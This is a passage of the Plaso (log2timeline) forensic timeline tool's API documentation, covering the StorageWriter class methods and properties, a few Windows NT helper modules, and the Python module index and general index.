The storage writer. class plaso.storage.writer.StorageWriter(storage_type='session') Bases: object Storage writer interface. AddAttributeContainer(container) Adds an attribute container. Parameters container (AttributeContainer) – attribute container. Raises • IOError – when the storage writer is closed. • OSError – when the storage writer is closed. AddOrUpdateEventTag(event_tag) Adds a new or updates an existing event tag. Parameters event_tag (EventTag) – event tag. Raises • IOError – when the storage writer is closed. • OSError – when the storage writer is closed. Close() Closes the storage writer. Raises • IOError – when the storage writer is closed. • OSError – when the storage writer is closed. GetAttributeContainerByIdentifier(container_type, identifier) Retrieves a specific type of container with a specific identifier. Parameters • container_type (str) – container type. • identifier (AttributeContainerIdentifier) – attribute container identifier. Returns attribute container or None if not available. Return type AttributeContainer Raises • IOError – when the storage writer is closed. • OSError – when the storage writer is closed. GetAttributeContainerByIndex(container_type, index) Retrieves a specific attribute container. Parameters • container_type (str) – attribute container type. • index (int) – attribute container index. Returns attribute container or None if not available.

5.1. Subpackages 501 Plaso (log2timeline), Release 20210606

Return type AttributeContainer Raises • IOError – when the storage writer is closed. • OSError – when the storage writer is closed. GetAttributeContainers(container_type) Retrieves a specific type of attribute containers. Parameters container_type (str) – attribute container type. Returns attribute container generator. Return type generator(AttributeContainers) Raises • IOError – when the storage writer is closed. • OSError – when the storage writer is closed. GetEvents() Retrieves the events. Returns event generator. Return type generator(EventObject) abstract GetFirstWrittenEventSource() Retrieves the first event source that was written after open. Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition. Returns event source or None if there are no newly written ones. Return type EventSource abstract GetNextWrittenEventSource() Retrieves the next event source that was written after open. Returns event source or None if there are no newly written ones. Return type EventSource GetSessions() Retrieves the sessions. Returns session generator. Return type generator(Session) GetSortedEvents(time_range=None) Retrieves the events in increasing chronological order. This includes all events written to the storage including those pending being flushed (written) to the storage. Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period. Returns event generator. Return type generator(EventObject) abstract Open(**kwargs) Opens the storage writer.

502 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

SetSerializersProfiler(serializers_profiler) Sets the serializers profiler. Parameters serializers_profiler (SerializersProfiler) – serializers profiler. SetStorageProfiler(storage_profiler) Sets the storage profiler. Parameters storage_profiler (StorageProfiler) – storage profiler. WriteSessionCompletion(session) Writes session completion information. Parameters session (Session) – session the storage changes are part of. Raises • IOError – when the storage writer is closed or if the storage type is not supported. • OSError – when the storage writer is closed or if the storage type is not supported. WriteSessionConfiguration(session) Writes session configuration information. Parameters session (Session) – session the storage changes are part of. Raises • IOError – when the storage writer is closed or if the storage type is not supported. • OSError – when the storage writer is closed or if the storage type is not supported. WriteSessionStart(session) Writes session start information. Parameters session (Session) – session the storage changes are part of. Raises • IOError – when the storage writer is closed or if the storage type is not supported. • OSError – when the storage writer is closed or if the storage type is not supported. WriteTaskCompletion(task) Writes task completion information. Parameters task (Task) – task. Raises • IOError – when the storage writer is closed or if the storage type is not supported. • OSError – when the storage writer is closed or if the storage type is not supported. WriteTaskStart(task) Writes task start information. Parameters task (Task) – task. Raises • IOError – when the storage writer is closed or if the storage type is not supported. • OSError – when the storage writer is closed or if the storage type is not supported. property number_of_analysis_reports number of analysis reports warnings written. Type int

5.1. Subpackages 503 Plaso (log2timeline), Release 20210606

property number_of_analysis_warnings number of analysis warnings written. Type int property number_of_event_sources number of event sources written. Type int property number_of_event_tags number of event tags written. Type int property number_of_events number of events written. Type int property number_of_extraction_warnings number of extraction warnings written. Type int property number_of_preprocessing_warnings number of preprocessing warnings written. Type int property number_of_recovery_warnings number of recovery warnings written. Type int

Module contents

5.1.16 plaso.unix package

Module contents

5.1.17 plaso.winnt package

Submodules plaso.winnt.known_folder_ids module

This file contains the Windows NT Known Folder identifier definitions.

504 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.winnt.language_ids module

This file contains the Windows NT Language identifiers. plaso.winnt.shell_folder_ids module

This file contains the Windows NT shell folder identifier definitions. plaso.winnt.time_zones module

This file contains the Windows NT time zone definitions. The Windows time zone names can be obtained from the following Windows Registry key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTime Zones The list below is based on time zone definitions from: * Windows 2000 * Windows 2003 * Windows 2008 * Windows 2012 * Windows 7 * Windows 8 * Windows 8.1 * Windows 10 * Windows XP And utils/generate_windows_time_zones.py

Module contents

5.2 Submodules

5.3 plaso.dependencies module

Functionality to check for the availability and version of dependencies. This file is generated by l2tdevtools update-dependencies.py, any dependency related changes should be madeinde- pendencies.ini. plaso.dependencies.CheckDependencies(verbose_output=True) Checks the availability of the dependencies. Parameters verbose_output (Optional[bool]) – True if output should be verbose. Returns True if the dependencies are available, False otherwise. Return type bool

5.4 Module contents

Super timeline all the things (Plaso Langar Að Safna Öllu). log2timeline is a tool designed to extract timestamps from various files found on a typical computer system(s) and aggregate them. Plaso is the Python rewrite of log2timeline.

5.2. Submodules 505 Plaso (log2timeline), Release 20210606

506 Chapter 5. plaso package CHAPTER SIX

INDICES AND TABLES

• genindex • modindex • search

507 Plaso (log2timeline), Release 20210606

508 Chapter 6. Indices and tables PYTHON MODULE INDEX

p plaso.cli.helpers.elastic_output, 66 plaso, 505 plaso.cli.helpers.elastic_ts_output, 66 plaso.analysis, 54 plaso.cli.helpers.event_filters, 67 plaso.analysis.browser_search, 39 plaso.cli.helpers.extraction, 67 plaso.analysis.chrome_extension, 40 plaso.cli.helpers.filter_file, 68 plaso.analysis.definitions, 40 plaso.cli.helpers.hashers, 69 plaso.analysis.hash_tagging, 40 plaso.cli.helpers.interface, 69 plaso.analysis.interface, 43 plaso.cli.helpers.language, 70 plaso.analysis.logger, 44 plaso.cli.helpers.manager, 70 plaso.analysis.manager, 44 plaso.cli.helpers.nsrlsvr_analysis, 71 plaso.analysis.mediator, 45 plaso.cli.helpers.output_modules, 72 plaso.analysis.nsrlsvr, 46 plaso.cli.helpers.parsers, 73 plaso.analysis.sessionize, 48 plaso.cli.helpers.process_resources, 73 plaso.analysis.tagging, 48 plaso.cli.helpers.profiling, 74 plaso.analysis.test_memory, 49 plaso.cli.helpers.sessionize_analysis, 74 plaso.analysis.unique_domains_visited, 49 plaso.cli.helpers.status_view, 75 plaso.analysis.viper, 50 plaso.cli.helpers.storage_format, 76 plaso.analysis.virustotal, 51 plaso.cli.helpers.tagging_analysis, 76 plaso.analysis.windows_services, 52 plaso.cli.helpers.temporary_directory, 77 plaso.analyzers, 62 plaso.cli.helpers.text_prepend, 77 plaso.analyzers.hashers, 59 plaso.cli.helpers.vfs_backend, 78 plaso.analyzers.hashers.entropy, 55 plaso.cli.helpers.viper_analysis, 78 plaso.analyzers.hashers.interface, 55 plaso.cli.helpers.virustotal_analysis, 79 plaso.analyzers.hashers.manager, 56 plaso.cli.helpers.windows_services_analysis, plaso.analyzers.hashers.md5, 57 80 plaso.analyzers.hashers.sha1, 58 plaso.cli.helpers.workers, 80 plaso.analyzers.hashers.sha256, 58 plaso.cli.helpers.xlsx_output, 81 plaso.analyzers.hashing_analyzer, 59 plaso.cli.helpers.yara_rules, 81 plaso.analyzers.interface, 59 plaso.cli.image_export_tool, 83 plaso.analyzers.logger, 60 plaso.cli.log2timeline_tool, 84 plaso.analyzers.manager, 60 plaso.cli.logger, 85 plaso.analyzers.yara_analyzer, 61 plaso.cli.pinfo_tool, 85 plaso.cli, 97 plaso.cli.psort_tool, 87 plaso.cli.analysis_tool, 82 plaso.cli.psteal_tool, 88 plaso.cli.extraction_tool, 82 plaso.cli.status_view, 89 plaso.cli.helpers, 82 plaso.cli.storage_media_tool, 90 plaso.cli.helpers.analysis_plugins, 62 plaso.cli.time_slices, 91 plaso.cli.helpers.artifact_definitions, 63 plaso.cli.tool_options, 92 plaso.cli.helpers.artifact_filters, 63 plaso.cli.tools, 93 plaso.cli.helpers.data_location, 64 plaso.cli.views, 95 plaso.cli.helpers.date_filters, 64 plaso.containers, 122 plaso.cli.helpers.dynamic_output, 65 plaso.containers.analyzer_result, 97

509 Plaso (log2timeline), Release 20210606

plaso.containers.artifacts, 98 plaso.formatters.shell_items, 174 plaso.containers.event_sources, 104 plaso.formatters.winevt_rc, 175 plaso.containers.events, 104 plaso.formatters.winlnk, 176 plaso.containers.interface, 108 plaso.formatters.winprefetch, 177 plaso.containers.manager, 109 plaso.formatters.winreg, 177 plaso.containers.plist_event, 110 plaso.formatters.yaml_formatters_file, 177 plaso.containers.reports, 111 plaso.lib, 186 plaso.containers.sessions, 111 plaso.lib.bufferlib, 178 plaso.containers.shell_item_events, 116 plaso.lib.decorators, 179 plaso.containers.storage_media, 117 plaso.lib.definitions, 179 plaso.containers.tasks, 117 plaso.lib.dtfabric_helper, 179 plaso.containers.time_events, 119 plaso.lib.errors, 180 plaso.containers.warnings, 120 plaso.lib.line_reader_file, 182 plaso.containers.windows_events, 121 plaso.lib.loggers, 183 plaso.dependencies, 505 plaso.lib.plist, 184 plaso.engine, 154 plaso.lib.specification, 184 plaso.engine.artifact_filters, 122 plaso.multi_process, 195 plaso.engine.configurations, 123 plaso.multi_process.analysis_engine, 186 plaso.engine.engine, 127 plaso.multi_process.analysis_process, 187 plaso.engine.extractors, 129 plaso.multi_process.base_process, 187 plaso.engine.filter_file, 130 plaso.multi_process.engine, 187 plaso.engine.filters_helper, 130 plaso.multi_process.extraction_engine, 188 plaso.engine.knowledge_base, 131 plaso.multi_process.extraction_process, 188 plaso.engine.logger, 135 plaso.multi_process.logger, 189 plaso.engine.path_filters, 135 plaso.multi_process.output_engine, 189 plaso.engine.path_helper, 136 plaso.multi_process.plaso_xmlrpc, 190 plaso.engine.plaso_queue, 137 plaso.multi_process.rpc, 191 plaso.engine.process_info, 138 plaso.multi_process.task_engine, 192 plaso.engine.processing_status, 138 plaso.multi_process.task_manager, 192 plaso.engine.profilers, 145 plaso.multi_process.task_process, 194 plaso.engine.tagging_file, 147 plaso.output, 211 plaso.engine.worker, 147 plaso.output.dynamic, 195 plaso.engine.yaml_filter_file, 148 plaso.output.elastic, 195 plaso.engine.zeromq_queue, 149 plaso.output.elastic_ts, 195 plaso.filters, 167 plaso.output.formatting_helper, 196 plaso.filters.event_filter, 154 plaso.output.interface, 197 plaso.filters.expression_parser, 155 plaso.output.json_line, 199 plaso.filters.expressions, 156 plaso.output.json_out, 199 plaso.filters.file_entry, 157 plaso.output.kml, 200 plaso.filters.filters, 160 plaso.output.l2t_csv, 200 plaso.filters.logger, 163 plaso.output.logger, 201 plaso.filters.parser_filter, 163 plaso.output.manager, 201 plaso.filters.path_filter, 165 plaso.output.mediator, 203 plaso.filters.value_types, 166 plaso.output.null, 205 plaso.formatters, 178 plaso.output.rawpy, 206 plaso.formatters.chrome, 167 plaso.output.shared_dsv, 206 plaso.formatters.chrome_preferences, 167 plaso.output.shared_elastic, 207 plaso.formatters.default, 168 plaso.output.shared_json, 209 plaso.formatters.file_system, 168 plaso.output.tln, 209 plaso.formatters.firefox, 169 plaso.output.xlsx, 210 plaso.formatters.interface, 169 plaso.parsers, 469 plaso.formatters.logger, 173 plaso.parsers.android_app_usage, 352 plaso.formatters.manager, 173 plaso.parsers.apache_access, 353 plaso.formatters.msiecf, 174 plaso.parsers.apt_history, 355

510 Python Module Index Plaso (log2timeline), Release 20210606

plaso.parsers.asl, 356 plaso.parsers.olecf_plugins.automatic_destinations, plaso.parsers.bash_history, 358 228 plaso.parsers.bencode_parser, 359 plaso.parsers.olecf_plugins.default, 230 plaso.parsers.bencode_plugins, 213 plaso.parsers.olecf_plugins.interface, 230 plaso.parsers.bencode_plugins.interface, 211 plaso.parsers.olecf_plugins.summary, 231 plaso.parsers.bencode_plugins.transmission, plaso.parsers.opera, 407 212 plaso.parsers.pe, 409 plaso.parsers.bencode_plugins.utorrent, 212 plaso.parsers.plist, 410 plaso.parsers.bsm, 360 plaso.parsers.plist_plugins, 239 plaso.parsers.chrome_cache, 361 plaso.parsers.plist_plugins.airport, 232 plaso.parsers.chrome_preferences, 363 plaso.parsers.plist_plugins.appleaccount, 232 plaso.parsers.cookie_plugins, 216 plaso.parsers.plist_plugins.bluetooth, 233 plaso.parsers.cookie_plugins.ganalytics, 213 plaso.parsers.plist_plugins.default, 233 plaso.parsers.cookie_plugins.interface, 215 plaso.parsers.plist_plugins.install_history, plaso.parsers.cookie_plugins.manager, 216 233 plaso.parsers.cups_ipp, 365 plaso.parsers.plist_plugins.interface, 234 plaso.parsers.custom_destinations, 366 plaso.parsers.plist_plugins.ipod, 235 plaso.parsers.czip, 367 plaso.parsers.plist_plugins.launchd, 235 plaso.parsers.czip_plugins, 219 plaso.parsers.plist_plugins.macuser, 236 plaso.parsers.czip_plugins.interface, 216 plaso.parsers.plist_plugins.safari, 236 plaso.parsers.czip_plugins.oxml, 217 plaso.parsers.plist_plugins.softwareupdate, plaso.parsers.docker, 367 237 plaso.parsers.dpkg, 369 plaso.parsers.plist_plugins.spotlight, 238 plaso.parsers.dsv_parser, 370 plaso.parsers.plist_plugins.spotlight_volume, plaso.parsers.esedb, 371 238 plaso.parsers.esedb_plugins, 228 plaso.parsers.plist_plugins.timemachine, 238 plaso.parsers.esedb_plugins.file_history, 219 plaso.parsers.pls_recall, 410 plaso.parsers.esedb_plugins.interface, 220 plaso.parsers.plugins, 411 plaso.parsers.esedb_plugins.msie_webcache, plaso.parsers.popcontest, 412 221 plaso.parsers.presets, 415 plaso.parsers.esedb_plugins.srum, 224 plaso.parsers.recycler, 416 plaso.parsers.filestat, 372 plaso.parsers.safari_cookies, 418 plaso.parsers.firefox_cache, 373 plaso.parsers.santa, 419 plaso.parsers.fseventsd, 375 plaso.parsers.sccm, 424 plaso.parsers.gdrive_synclog, 376 plaso.parsers.selinux, 426 plaso.parsers.google_logging, 377 plaso.parsers.setupapi, 427 plaso.parsers.iis, 378 plaso.parsers.shared, 240 plaso.parsers.interface, 381 plaso.parsers.shared.shell_items, 239 plaso.parsers.java_idx, 384 plaso.parsers.skydrivelog, 428 plaso.parsers.logger, 385 plaso.parsers.sophos_av, 431 plaso.parsers.mac_appfirewall, 385 plaso.parsers.spotlight_storedb, 432 plaso.parsers.mac_keychain, 386 plaso.parsers.sqlite, 434 plaso.parsers.mac_securityd, 389 plaso.parsers.sqlite_plugins, 316 plaso.parsers.mac_wifi, 390 plaso.parsers.sqlite_plugins.android_calls, plaso.parsers.mactime, 392 240 plaso.parsers.manager, 393 plaso.parsers.sqlite_plugins.android_sms, 243 plaso.parsers.mcafeeav, 395 plaso.parsers.sqlite_plugins.android_webview, plaso.parsers.mediator, 397 245 plaso.parsers.msiecf, 401 plaso.parsers.sqlite_plugins.android_webviewcache, plaso.parsers.networkminer, 403 246 plaso.parsers.ntfs, 404 plaso.parsers.sqlite_plugins.appusage, 247 plaso.parsers.olecf, 407 plaso.parsers.sqlite_plugins.chrome_autofill, plaso.parsers.olecf_plugins, 232 248

Python Module Index 511 Plaso (log2timeline), Release 20210606

plaso.parsers.sqlite_plugins.chrome_cookies, plaso.parsers.winevtx, 456 249 plaso.parsers.winfirewall, 458 plaso.parsers.sqlite_plugins.chrome_extension_activityplaso.parsers.winjob, , 460 251 plaso.parsers.winlnk, 461 plaso.parsers.sqlite_plugins.chrome_history, plaso.parsers.winprefetch, 463 253 plaso.parsers.winreg_parser, 464 plaso.parsers.sqlite_plugins.firefox_cookies, plaso.parsers.winreg_plugins, 352 259 plaso.parsers.winreg_plugins.amcache, 318 plaso.parsers.sqlite_plugins.firefox_downloadsplaso.parsers.winreg_plugins.appcompatcache, , 260 321 plaso.parsers.sqlite_plugins.firefox_history, plaso.parsers.winreg_plugins.bagmru, 322 262 plaso.parsers.winreg_plugins.bam, 323 plaso.parsers.sqlite_plugins.gdrive, 267 plaso.parsers.winreg_plugins.ccleaner, 323 plaso.parsers.sqlite_plugins.hangouts_messagesplaso.parsers.winreg_plugins.default, , 325 270 plaso.parsers.winreg_plugins.interface, 325 plaso.parsers.sqlite_plugins.imessage, 273 plaso.parsers.winreg_plugins.lfu, 327 plaso.parsers.sqlite_plugins.interface, 275 plaso.parsers.winreg_plugins.mountpoints, 328 plaso.parsers.sqlite_plugins.kik_ios, 276 plaso.parsers.winreg_plugins.mrulist, 329 plaso.parsers.sqlite_plugins.kodi, 278 plaso.parsers.winreg_plugins.mrulistex, 331 plaso.parsers.sqlite_plugins.ls_quarantine, plaso.parsers.winreg_plugins.msie_zones, 333 281 plaso.parsers.winreg_plugins.network_drives, plaso.parsers.sqlite_plugins.mac_document_versions, 334 282 plaso.parsers.winreg_plugins.networks, 335 plaso.parsers.sqlite_plugins.mac_knowledgec, plaso.parsers.winreg_plugins.officemru, 336 284 plaso.parsers.winreg_plugins.outlook, 337 plaso.parsers.sqlite_plugins.mac_notes, 286 plaso.parsers.winreg_plugins.programscache, plaso.parsers.sqlite_plugins.mac_notificationcenter, 337 288 plaso.parsers.winreg_plugins.run, 338 plaso.parsers.sqlite_plugins.mackeeper_cache, plaso.parsers.winreg_plugins.sam_users, 339 289 plaso.parsers.winreg_plugins.services, 340 plaso.parsers.sqlite_plugins.macos_tcc, 291 plaso.parsers.winreg_plugins.shutdown, 341 plaso.parsers.sqlite_plugins.safari, 292 plaso.parsers.winreg_plugins.task_scheduler, plaso.parsers.sqlite_plugins.skype, 294 342 plaso.parsers.sqlite_plugins.tango_android, plaso.parsers.winreg_plugins.terminal_server, 300 343 plaso.parsers.sqlite_plugins.twitter_android, plaso.parsers.winreg_plugins.timezone, 344 303 plaso.parsers.winreg_plugins.typedurls, 345 plaso.parsers.sqlite_plugins.twitter_ios, 308 plaso.parsers.winreg_plugins.usb, 346 plaso.parsers.sqlite_plugins.windows_timeline,plaso.parsers.winreg_plugins.usbstor, 347 311 plaso.parsers.winreg_plugins.userassist, 348 plaso.parsers.sqlite_plugins.zeitgeist, 314 plaso.parsers.winreg_plugins.windows_version, plaso.parsers.symantec, 436 349 plaso.parsers.syslog, 441 plaso.parsers.winreg_plugins.winlogon, 350 plaso.parsers.syslog_plugins, 318 plaso.parsers.winreg_plugins.winrar, 351 plaso.parsers.syslog_plugins.cron, 316 plaso.parsers.winrestore, 464 plaso.parsers.syslog_plugins.interface, 316 plaso.parsers.xchatlog, 465 plaso.parsers.syslog_plugins.ssh, 317 plaso.parsers.xchatscrollback, 467 plaso.parsers.systemd_journal, 444 plaso.parsers.zsh_extended_history, 468 plaso.parsers.text_parser, 445 plaso.preprocessors, 478 plaso.parsers.trendmicroav, 448 plaso.preprocessors.interface, 469 plaso.parsers.utmp, 451 plaso.preprocessors.linux, 471 plaso.parsers.utmpx, 453 plaso.preprocessors.logger, 472 plaso.parsers.vsftpd, 454 plaso.preprocessors.macos, 472 plaso.parsers.winevt, 455 plaso.preprocessors.manager, 473

512 Python Module Index Plaso (log2timeline), Release 20210606 plaso.preprocessors.mediator, 474 plaso.preprocessors.windows, 475 plaso.serializer, 479 plaso.serializer.interface, 478 plaso.serializer.json_serializer, 478 plaso.serializer.logger, 479 plaso.single_process, 480 plaso.single_process.extraction_engine, 479 plaso.storage, 504 plaso.storage.event_tag_index, 492 plaso.storage.factory, 493 plaso.storage.fake, 483 plaso.storage.fake.event_heap, 480 plaso.storage.fake.fake_store, 480 plaso.storage.fake.writer, 482 plaso.storage.identifiers, 494 plaso.storage.interface, 495 plaso.storage.logger, 498 plaso.storage.merge_reader, 498 plaso.storage.reader, 499 plaso.storage.redis, 488 plaso.storage.redis.reader, 483 plaso.storage.redis.redis_store, 484 plaso.storage.redis.writer, 487 plaso.storage.sqlite, 492 plaso.storage.sqlite.reader, 488 plaso.storage.sqlite.sqlite_file, 489 plaso.storage.sqlite.writer, 491 plaso.storage.time_range, 500 plaso.storage.writer, 501 plaso.unix, 504 plaso.winnt, 505 plaso.winnt.known_folder_ids, 504 plaso.winnt.language_ids, 505 plaso.winnt.shell_folder_ids, 505 plaso.winnt.time_zones, 505

Python Module Index 513 Plaso (log2timeline), Release 20210606

514 Python Module Index INDEX

Symbols A __enter__() (plaso.lib.line_reader_file.BinaryLineReaderabort (plaso.analysis.mediator.AnalysisMediator prop- method), 182 erty), 46 __enter__() (plaso.storage.reader.StorageReader abort (plaso.parsers.mediator.ParserMediator prop- method), 500 erty), 400 __eq__() (plaso.analysis.windows_services.WindowsServiceaborted (plaso.containers.sessions.Session attribute), method), 53 111 __eq__() (plaso.containers.artifacts.PathArtifact aborted (plaso.containers.sessions.SessionCompletion method), 100 attribute), 114 __exit__() (plaso.lib.line_reader_file.BinaryLineReader aborted (plaso.containers.tasks.Task attribute), 117 method), 182 aborted (plaso.containers.tasks.TaskCompletion at- __exit__() (plaso.storage.reader.StorageReader tribute), 119 method), 500 aborted (plaso.engine.processing_status.ProcessingStatus __ge__() (plaso.containers.artifacts.PathArtifact attribute), 142 method), 100 access (plaso.parsers.symantec.SymantecEventData at- __gt__() (plaso.containers.artifacts.PathArtifact tribute), 436 method), 100 access_count (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData __iter__() (plaso.lib.bufferlib.CircularBuffer method), attribute), 221 178 account_name (plaso.parsers.mac_keychain.KeychainApplicationRecordEventData __iter__() (plaso.lib.line_reader_file.BinaryDSVReader attribute), 386 method), 182 account_name (plaso.parsers.mac_keychain.KeychainInternetRecordEventData __iter__() (plaso.lib.line_reader_file.BinaryLineReader attribute), 387 method), 182 account_rid (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventData __le__() (plaso.containers.artifacts.PathArtifact attribute), 339 method), 100 action (plaso.parsers.docker.DockerJSONContainerEventData __len__() (plaso.lib.bufferlib.CircularBuffer method), attribute), 367 178 action (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventData __lt__() (plaso.containers.artifacts.PathArtifact attribute), 385 method), 100 action (plaso.parsers.mac_wifi.MacWifiLogEventData __lt__() (plaso.containers.event_sources.EventSource attribute), 390 method), 104 action (plaso.parsers.mcafeeav.McafeeAVEventData at- __lt__() (plaso.containers.events.EventObject method), tribute), 395 106 action (plaso.parsers.santa.SantaExecutionEventData __lt__() (plaso.containers.tasks.Task method), 118 attribute), 419 __ne__() (plaso.containers.artifacts.PathArtifact action (plaso.parsers.santa.SantaFileSystemEventData method), 100 attribute), 420 __repr__() (plaso.filters.expressions.BinaryExpression action (plaso.parsers.santa.SantaMountEventData at- method), 156 tribute), 421 __repr__() (plaso.filters.expressions.EventExpression action (plaso.parsers.trendmicroav.TrendMicroAVEventData method), 156 attribute), 449 action (plaso.parsers.winfirewall.WinFirewallEventData attribute), 458

515 Plaso (log2timeline), Release 20210606

action0 (plaso.parsers.symantec.SymantecEventData class method), 72 attribute), 436 AddArguments() (plaso.cli.helpers.parsers.ParsersArgumentsHelper action1 (plaso.parsers.symantec.SymantecEventData class method), 73 attribute), 436 AddArguments() (plaso.cli.helpers.process_resources.ProcessResourcesArgumentsHelper action1_status (plaso.parsers.symantec.SymantecEventData class method), 73 attribute), 436 AddArguments() (plaso.cli.helpers.profiling.ProfilingArgumentsHelper action2 (plaso.parsers.symantec.SymantecEventData class method), 74 attribute), 436 AddArguments() (plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelper action2_status (plaso.parsers.symantec.SymantecEventData class method), 74 attribute), 436 AddArguments() (plaso.cli.helpers.status_view.StatusViewArgumentsHelper action_type (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataclass method), 75 attribute), 251 AddArguments() (plaso.cli.helpers.storage_format.StorageFormatArgumentsHelper action_type (plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventDataclass method), 76 attribute), 299 AddArguments() (plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelper actions (plaso.filters.expression_parser.Token at- class method), 76 tribute), 155 AddArguments() (plaso.cli.helpers.temporary_directory.TemporaryDirectoryArgumentsHelper active_duration_seconds class method), 77 (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventDataAddArguments() (plaso.cli.helpers.text_prepend.TextPrependArgumentsHelper attribute), 314 class method), 77 activity_id (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataAddArguments() (plaso.cli.helpers.vfs_backend.VFSBackEndArgumentsHelper attribute), 251 class method), 78 AddArgument() (plaso.filters.expressions.Expression AddArguments() (plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelper method), 157 class method), 78 AddArguments() (plaso.cli.helpers.analysis_plugins.AnalysisPluginsArgumentsHelperAddArguments() (plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelper class method), 62 class method), 79 AddArguments() (plaso.cli.helpers.artifact_definitions.ArtifactDefinitionsArgumentsHelperAddArguments() (plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelper class method), 63 class method), 80 AddArguments() (plaso.cli.helpers.artifact_filters.ArtifactFiltersArgumentsHelperAddArguments() (plaso.cli.helpers.workers.WorkersArgumentsHelper class method), 63 class method), 80 AddArguments() (plaso.cli.helpers.data_location.DataLocationArgumentsHelperAddArguments() (plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelper class method), 64 class method), 81 AddArguments() (plaso.cli.helpers.date_filters.DateFiltersArgumentsHelperAddArguments() (plaso.cli.helpers.yara_rules.YaraRulesArgumentsHelper class method), 64 class method), 81 AddArguments() (plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelperAddAttributeContainer() class method), 65 (plaso.storage.interface.BaseStore method), AddArguments() (plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelper495 class method), 66 AddAttributeContainer() AddArguments() (plaso.cli.helpers.elastic_ts_output.ElasticTimesketchOutputArgumentsHelper(plaso.storage.merge_reader.StorageMergeReader class method), 66 method), 498 AddArguments() (plaso.cli.helpers.event_filters.EventFiltersArgumentsHelperAddAttributeContainer() class method), 67 (plaso.storage.writer.StorageWriter method), AddArguments() (plaso.cli.helpers.extraction.ExtractionArgumentsHelper501 class method), 67 AddAvailableTimeZone() AddArguments() (plaso.cli.helpers.filter_file.FilterFileArgumentsHelper(plaso.engine.knowledge_base.KnowledgeBase class method), 68 method), 131 AddArguments() (plaso.cli.helpers.hashers.HashersArgumentsHelperAddBasicOptions() (plaso.cli.tools.CLITool method), class method), 69 93 AddArguments() (plaso.cli.helpers.interface.ArgumentsHelperAddCommandLineArguments() class method), 69 (plaso.cli.helpers.manager.ArgumentHelperManager AddArguments() (plaso.cli.helpers.language.LanguageArgumentsHelperclass method), 70 class method), 70 AddCredentialOptions() AddArguments() (plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelper(plaso.cli.storage_media_tool.StorageMediaTool class method), 71 method), 90 AddArguments() (plaso.cli.helpers.output_modules.OutputModulesArgumentsHelperAddCustomHelper() (plaso.formatters.interface.EventFormatter

516 Index Plaso (log2timeline), Release 20210606

method), 172 AddRow() (plaso.cli.views.CLITabularTableView AddDateTimeRange() (plaso.filters.file_entry.DateTimeFileEntryFiltermethod), 96 method), 157 AddService() (plaso.analysis.windows_services.WindowsServiceCollection AddEnvironmentVariable() method), 53 (plaso.engine.knowledge_base.KnowledgeBase AddSpecification() (plaso.lib.specification.FormatSpecificationStore method), 131 method), 185 AddFilter() (plaso.filters.file_entry.FileEntryFilterCollectionAddStorageMediaImageOptions() method), 159 (plaso.cli.storage_media_tool.StorageMediaTool AddFilterOptions() (plaso.cli.image_export_tool.ImageExportToolmethod), 90 method), 83 AddStorageOptions() AddHelper() (plaso.formatters.interface.EventFormatter (plaso.cli.log2timeline_tool.Log2TimelineTool method), 172 method), 85 AddInformationalOptions() (plaso.cli.tools.CLITool AddStorageOptions() method), 93 (plaso.cli.psteal_tool.PstealTool method), AddLabel() (plaso.containers.events.EventTag method), 88 107 AddStorageOptions() AddLabels() (plaso.containers.events.EventTag (plaso.cli.tool_options.StorageFileOptions method), 107 method), 93 AddLegacyStorageOptions() AddTimeZoneInformation() (plaso.cli.log2timeline_tool.Log2TimelineTool (plaso.preprocessors.mediator.PreprocessMediator method), 85 method), 474 AddLogFileOptions() (plaso.cli.tools.CLITool AddTimeZoneOption() method), 93 (plaso.cli.extraction_tool.ExtractionTool AddNewSignature() (plaso.lib.specification.FormatSpecification method), 83 method), 184 AddUserAccount() (plaso.engine.knowledge_base.KnowledgeBase AddNewSpecification() method), 131 (plaso.lib.specification.FormatSpecificationStore AddUserAccount() (plaso.preprocessors.mediator.PreprocessMediator method), 185 method), 474 AddOperands() (plaso.filters.expressions.BinaryExpressionAddVSSProcessingOptions() method), 156 (plaso.cli.storage_media_tool.StorageMediaTool AddOrUpdateEventTag() method), 90 (plaso.storage.writer.StorageWriter method), AddWindowsEventLogProvider() 501 (plaso.engine.knowledge_base.KnowledgeBase AddOutputOptions() (plaso.cli.tool_options.OutputModuleOptions method), 131 method), 92 AddWindowsEventLogProvider() AddPathSegment() (plaso.filters.path_filter.PathFilterScanTreeNode(plaso.preprocessors.mediator.PreprocessMediator method), 165 method), 475 AddPerformanceOptions() agent (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventData (plaso.cli.extraction_tool.ExtractionTool attribute), 385 method), 83 agent (plaso.parsers.mac_wifi.MacWifiLogEventData AddProcessingOptions() attribute), 391 (plaso.cli.extraction_tool.ExtractionTool agent (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantineEventData method), 83 attribute), 281 AddProcessingOptions() AirportPlugin (class in (plaso.cli.psort_tool.PsortTool method), plaso.parsers.plist_plugins.airport), 232 87 ALL_PLUGINS (plaso.parsers.interface.BaseParser address (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventDataattribute), 382 attribute), 243 ALL_PLUGINS (plaso.parsers.manager.ParsersManager address (plaso.parsers.symantec.SymantecEventData attribute), 393 attribute), 436 allowed 